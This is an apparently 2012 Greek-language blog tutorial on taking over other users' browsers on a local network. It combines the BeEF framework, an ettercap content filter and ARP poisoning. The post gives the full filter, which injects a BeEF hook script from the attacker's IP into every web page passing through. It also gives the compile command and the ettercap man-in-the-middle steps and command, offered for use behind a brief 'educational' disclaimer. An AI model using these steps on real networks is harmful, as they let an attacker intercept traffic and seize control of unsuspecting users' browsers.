ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Τετάρτη 4 Ιανουαρίου 2012

Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του


Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο

Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.Cross-Site-Sctript (xss)


  • πριν αρχισουμε παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα
  • #Nickthesail0r
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</head>")) {
            replace("</head>", "</head><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("EPIASES_LAYRAKI\n");
        }
        if (search(DATA.data, "</HEAD>")) {
            replace("</HEAD>", "</HEAD><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("epiases_layraki\n");
        }
    }
  • πρεπει να βαλεις την δικια σου ip στο http://192.168.1.66
  • μετα παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef
  • παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)

  • αλλαξε το http://127.0.0.1/beef με την δικια σου ip πχ http://192.168.1.66/beef ,πατα apply config και finished 
  • τωρα για να δειτε τι κανει το beEF ακριβως μπορεις να το δοκιμασεις σε εσενα αν πας στο view spawn zombie example
     και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα

  • και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss 

  • Υπαρχουνε παρα πολλες επιλογες οπως να εισβαλετε στον υπολογιστη του να τον ανακατευθυνετε σε αλλη σελιδα κτλ
  • τωρα πως κανουμε το θυμα να ενωθει μαζι μας;
  • ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο και γραφουμε
  • etterfilter /root/Desktop/xssbeef -ο xssbeef.ef
  • μας εμφανιζει αυτο
  • etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA


     12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

     11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

     Parsing source file '/root/Desktop/xssbeef'  done.

     Unfolding the meta-tree  done.

     Converting labels to real offsets  done.

     Writing output to 'filter.ef'  done.

     -> Script encoded into 20 instructions.
  • μετα γραφουμε στο τερματικο ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift+u επιλεγουμε wlan0 μετα ctrl+s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl+f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα 
  • τελος παταμε ctrl+w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες) * αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef'  -i wlan0


Δεν υπάρχουν σχόλια: